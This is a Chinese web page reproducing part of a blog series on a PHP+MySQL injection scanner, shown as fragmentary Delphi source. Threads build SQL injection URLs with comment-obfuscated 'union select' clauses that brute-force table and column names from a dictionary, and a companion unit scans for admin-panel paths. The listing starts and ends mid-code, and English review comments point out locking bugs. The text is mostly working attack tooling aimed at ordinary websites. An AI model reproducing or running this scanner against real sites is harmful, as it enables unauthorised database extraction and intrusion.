PHP+MYSQL网站注入扫描[22]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选自 lanyus 的 blog

integer;
begin
stoped :=false;
with form1 do
begin
  pg1.min :=0;
  pg1.max :=form1.lsbdict.count;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
end;
entercriticalsection(cs); //进入临界区
fmemo.lines.add('');
fmemo.lines.add('开始猜解表段。。。');
fmemo.lines.add('');
for i:=0 to form1.lsbdict.count-1 do
begin
  if stoped then
  begin
    fmemo.lines.add('');
  fmemo.lines.add('表段猜解结束。。。');
  form1.pg1.visible :=false;
  exit;
  end;
  fvalue :=form1.lsbdict.items;
  if fvalue='' then continue;
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+fstr+'/**/from/**/'+fvalue+'/*';
  fmemo.lines.add(injurl);
  form1.pg1.stepit;
  if get(injurl,fkeyword) then
  begin
    synchronize(scantableresult); //同步
  end;
end;
fmemo.lines.add('');
fmemo.lines.add('表段猜解结束。。。');
form1.pg1.visible :=false;
leavecriticalsection(cs); //退出临界区
sleep(20); // 线程挂起;
end;

//创建多个线程完成字段猜解
constructor scanfieldthread.create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
begin
  // Capture the probe parameters first, then the UI sinks, so that every
  // field is populated before the inherited constructor starts the thread.
  furl := url;
  fstr := str;
  fkeyword := keyword;
  ftable := table;
  fnum := num;
  fmemo := memo;
  flistview := listview;
  // The thread frees itself once Execute returns.
  freeonterminate := true;
  // NOTE(review): cs appears to be a critical section shared by all scan
  // threads (its companion unit declares it as a unit global), yet it is
  // (re)initialised from every constructor. Initialising a section that a
  // running thread may already hold discards its state; it belongs in the
  // unit's initialization section with a matching DeleteCriticalSection in
  // finalization. Kept here to preserve the original behaviour.
  initializecriticalsection(cs);
  // Create(False): the thread starts immediately rather than suspended.
  inherited create(false);
end;

// Appends one row to the result list view: the caption is the running row
// count (taken after the add, so it includes the new row) and the first
// sub-item is the dictionary value that produced a hit. Execute hands this
// to Synchronize, so it runs on the main thread.
procedure scanfieldthread.scanfieldresult;
var
  row: tlistitem;
begin
  row := flistview.items.add;
  row.caption := inttostr(flistview.items.count);
  row.subitems.add(fvalue);
end;

// Thread body: builds one probe URL for the dictionary entry at index fnum,
// logs it to the memo, and records a hit in the list view via scanfieldresult.
procedure scanfieldthread.execute;
var
i:integer; // unused
tmpstr:string;
begin
// NOTE(review): fnum is not range-checked; an index past lsbdict.count raises
// from the VCL accessor before the critical section is entered.
fvalue :=form1.lsbdict.items[fnum];
tmpstr :=stringreplace(fstr,'&fieldname&',fvalue,[rfignorecase]);
injurl:=furl+'/**/and/**/1=1/**/union/**/select/**/'+tmpstr+'/**/from/**/'+ftable+'/*';
entercriticalsection(cs); // enter critical section
// NOTE(review): the section is held across a blocking network call and a
// Synchronize round-trip, and nothing releases it if get() raises — one
// failed request then leaves every other scan thread blocked. A try/finally
// around the region, with Synchronize moved outside the lock, would fix this.
// NOTE(review): this memo write runs on the worker thread while the list-view
// update below goes through Synchronize — the memo write likely needs the
// same treatment.
fmemo.lines.add(injurl);
if get(injurl,fkeyword) then // get() is defined elsewhere; presumably true when fkeyword appears in the response — confirm
begin
  synchronize(scanfieldresult); // marshal the list-view update onto the main thread
end;
leavecriticalsection(cs); // leave critical section
sleep(20); // suspend the thread briefly
end;

end.


//后台管理扫描线程类
unit unit3;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,wininet;

var
cs:trtlcriticalsection;   // unit-global critical section; NOTE(review): (re)initialised by every scanmanagerthread constructor, see create

type
// Worker thread for the admin-path scan. Create stores its arguments in the
// fields below; the scan itself happens in Execute (not shown here).
scanmanagerthread = class(tthread)
private
  tmplbx :tlistbox;    // set from Create's lbx argument; presumably the candidate list consumed by Execute — confirm
  tmpmemo :tmemo;      // set from Create's memo argument; output sink
  tmpnum :integer;     // set from Create's num argument; meaning defined by Execute — not shown
  tmpurl :string;      // set from Create's url argument; base address being scanned
  str :string;         // not assigned in Create; presumably filled in by Execute — confirm
  procedure scanresult; // presumably run via Synchronize to update the UI, as the sibling thread classes do — not shown
protected
  procedure execute; override;
public
  constructor create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
end;

implementation

uses unit1;

constructor scanmanagerthread.create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
begin
  // Store the scan parameters before the thread is started.
  tmpurl := url;
  tmpnum := num;
  // UI sinks the thread reports to.
  tmplbx := lbx;
  tmpmemo := memo;
  // The thread frees itself once Execute returns.
  freeonterminate := true;
  // NOTE(review): cs is the unit-global critical section declared in this
  // unit's interface, yet it is (re)initialised here by every new thread.
  // Initialising a section that a running thread may already hold discards
  // its state; it belongs in the unit's initialization section with a
  // matching DeleteCriticalSection in finalization. Kept to preserve behaviour.
  initializecriticalsection(cs);
  // Create(False): the thread starts immediately rather than suspended.
  inherited create(false);
end;

//====================== 判断网址是否存在的函数 =======================
function checkurl(url: string; timeout: integer = 5000): boolean;
var
hsession, hfile, hrequest: hinternet;
dwindex, dwcodelen: dword;
dwcode: array[1..20] of char;
res: pchar;
re: integer;
err1: integer;
j: integer;
begin
if pos('http://', lowercase(url)) = 0 then
  url := 'http://' + url;
result := false;
internetsetoption(hsession, internet_option_connect_timeout, @timeout, 4);
hsession := internetopen('mozilla/4.0', internet_open_type_preconfig, nil, nil, 0);
  //设置超时
if assigned(hsession) then
begin
  j := 1;
  while true do
  begin
    hfile := internetopenurl(hsession, pchar(url), nil, 0, internet_flag_reload, 0);
  if hfile = nil then
    begin
    j := j + 1;
    err1 := getlasterror;
    if j > 5 then break;
    if (err1 <> 12002) or (err1 <> 12152) then break;
    sleep(2);
    end
    else begin
    break;
    end;
  end;
  dwindex := 0;
  dwcodelen := 10;
  httpqueryinfo(hfile, http_query_status_code, @dwcode, dwcodelen, dwindex);
  res := pchar(@dwcode);
  re := strtointdef(res, 404);
  case re of
    400..450: result := false;
  else result := true;
  end;
  if assigned(hfile) then
    internetclosehandle(hfile);
    internetclosehandle(hsession);
  end
